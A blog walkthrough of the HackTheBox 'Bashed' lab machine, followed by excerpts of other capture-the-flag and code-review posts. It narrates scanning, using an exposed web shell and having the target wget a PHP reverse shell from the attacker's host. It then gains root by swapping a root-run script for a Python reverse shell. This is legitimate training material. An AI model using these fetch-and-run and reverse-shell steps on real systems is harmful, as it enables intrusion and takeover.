Skip to main content

HTB BASHED WALK-THROUGH


HackTheBox is an excellent platform for various pen-testers to increase their testing skills and knowledge.
Machine Level -Easy
Machine Name -Bashed
Machine OS -Linux
Machine IP -10.10.10.68
Tools:
Nmap -Nmap is a fantastic tools for scanning the open ports, services and OS detection. You can use other tools other than nmap (which ever you are more comfortable with ) like masscan, SPARTA etc. to scan for open ports.
Method:
First step is always to scan the machine , so start a nmap scan , use the command
sudo nmap -sSVC 10.10.10.68
,this will scan for open ports and services on the host.
We see that only one port is open. (i.e. port 80) and it is running a Apache server.
Lets visit the site 10.10.10.68
We see that there a lot of content about "phpbash". That's some useful information.
Click around to see if you find something useful.
There's nothing much to see here. So lets use 'DirBuster' for directory busting and see if we find something interesting.
We see a phpbash.php page in dev folder.
Lets visit this page.
There is a bashed interface , move around and grab the user flag. As you can see by whoami command that we are not root , so we cannot grab root flag right away.
Lets try and see if there is a path with root privilege and no password.
Use the command sudo -l
We can see scriptmanager with no password.
Try sudo su scriptmanager to see if we can change our privilages.
It fails, and says no tty present.
Lets see if we find something more useful in DirBuster , we can see a uploads folder. Seems like we can upload files here. Lets visit this page.
It is blank. But we can upload files here.
Lets see if we can upload a php and get a reverse shell.
Search for php reverse shell on google.
Click on this one.
Scroll down to see download link for php file.
It says we need to do some changes in the file. Lets download this and extract it.
Open the php file and make the modification and the save it with a name of your choice(mine is rev.php)
We need to the changes here.
Put your own ip here.(If you wanna change the port you can , I am using the same)
Now , we need to upload the file to the machine.
First lets host a server from our side.
You the command sudo python -m SimpleHTTPServer 80
(we are hosting our server on port 80)
Now we need to download the file , first change the directory to uploads folder and then use the command wget http://10.10.14.2/Desktop/rev.php
(this command tells the server to download(wget) the php file from our ip address and we also provide the path of the php file to be uploaded.)
Transfer successful. Lets just verify that it is there.
Its there, now we need a listening port on our side. Use the netcat command to set up the listening port  nc -nvlp 1234
Now we need to run the php file.
Now, see if you get a reverse shell.
We are connected. But still the shell is unstable.
Lets see if we can spawn the tty shell.
Search for tty escape on google.
Visit this one.
Replace the sh with bash and run it in the opened shell.
Its imported , now lets escape the tty shell and see if we can change our privilege.
Now we are scriptmanager . Verify it by command whoami
Now we need to find a way to become root.
Do ls -la and see if u find some unusual directory.
We see all others require root privileges except one named scripts.
Change the directory to scripts and see what in the directory.
There are two files named test , one is a python file with scriptmanager and a text file with root privilege's. Lets see what's in the test.py file
If you see the modification time for the test.txt file, its the current time. This means that if we run test.py file then it gets executed in test.txt file which is a root privileged. Lets exploit this.
Lets search for python reverse shell on google.
Lets visit this one.
Now copy everything except python -c
Paste it in a new file (named test.py)
We need to make changes inhere :
 1) change the listening IP and port
 2)change sh to bash
Save the file.
Now we need to create a new listening port .
Use nc -nvlp 2345 command to start a netcat listener.
Now lets host the server for file upload.
Use sudo python -m SimpleHTTPServer 80
Now lets grab  the test file. But before that we need to remove the existing test.py file else our file will get renamed.
Use the command rm test.py to delete the existing file.
Now use the command wget http://10.10.14.2/test.py
to grab the test.py file.
Run the test.py file and see the netcat terminal.
Try cd /root , now you can access the root . Grab the root flag.
That's all for this machine.

Thanks for reading !

Comments

Post a Comment

Popular posts from this blog

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named ...
Post a Comment
Read more

Beginners Code Review Part 1

  Image credits to  Leobit This is a walkthrough of an exercise created by  PentesterLab  as a free course for learning beginner-friendly source code review. The link to the source code is here . Either clone it or download it as a zip locally. As instructed in the exercise we won't run the run, just read through the source code and look for possible weaknesses that we can leverage into vulnerabilities. LIST OF WEAKNESSES You can find below the list of issues present in the application: Hardcoded credentials or secrets Information leak Missing security flags Weak password hashing mechanism Cross-Site Scripting No CSRF protection Directory Listing Crypto issue Signature bypass Authentication bypass Authorization bypass Remote Code Execution Hand-On Findings and Objectives * Hardcoded credentials or secrets      ...
Post a Comment
Read more

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT

Kioptrix Level 1 is a beginner level CTF challenge. You can download this virtual machine from here .  Details of Kioptrix : Size----186 MB OS---Linux Note: In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network. Fire-up both the machines(Kali and Kioptrix Level 1) Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself. Leave the Kioptrix machine as it is and switch to Kali. First we need to find the IP address of the Kioptrix machine. We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address. Command   sudo netdiscover -i eth0 Wait  for scan results. 192.168.233.130 seems to be the IP of the Kioptrix machine. Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine) Command  su...
1 comment
Read more